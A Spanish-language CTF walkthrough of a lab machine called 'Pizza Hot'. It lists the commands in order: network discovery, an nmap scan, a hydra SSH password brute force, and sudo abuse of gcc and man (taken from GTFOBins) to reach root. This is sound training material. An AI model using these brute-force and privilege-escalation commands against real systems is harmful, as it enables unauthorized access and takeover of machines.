Máquina: Pizza Hot
SO: Linux
Dificultad: Facil
Descarga


img

1. Enumo dispositivos en la red.

sudo arp-scan -l

img

2. Escaneo los puertos y servicios.

sudo nmap -p- --open -sCV -T5 -n -Pn --min-rate=5000 192.168.1.9

img

3. Visito la web, revisando la fuente encuentro un usuario potencial.

img img

4. Bruteforce con hydra al ssh.

hydra -l pizzapiña -P /usr/share/wordlists/wockyou.txt ssh://192.168.1.9

img

5. Conectandome por ssh con el usuario pizzapiña.

ssh pizzapiña@192.168.1.9

img

6. Viendo nuestros permisos sudo, tengo el binario gcc que puedo ejecutar como pizzasinpiña.

sudo -l

img

7. En gtfobins tenemos el comando para escalar o en este caso migrar de usuario.

sudo -u pizzasinpiña gcc -wrapper /usr/bin/bash,-s .

img

8. Ahora tenemos un binario que podemos ejecutar como root.

sudo -l

img

9. Escalando privilegios a root, gtfobins.

9.1- Ejecutamos el siguiente comando

sudo -u root man man

img

9.2- En este punto nos lanzamos una bash

!/bin/bash

img

9.3- Ya somos root

img


Finalizado.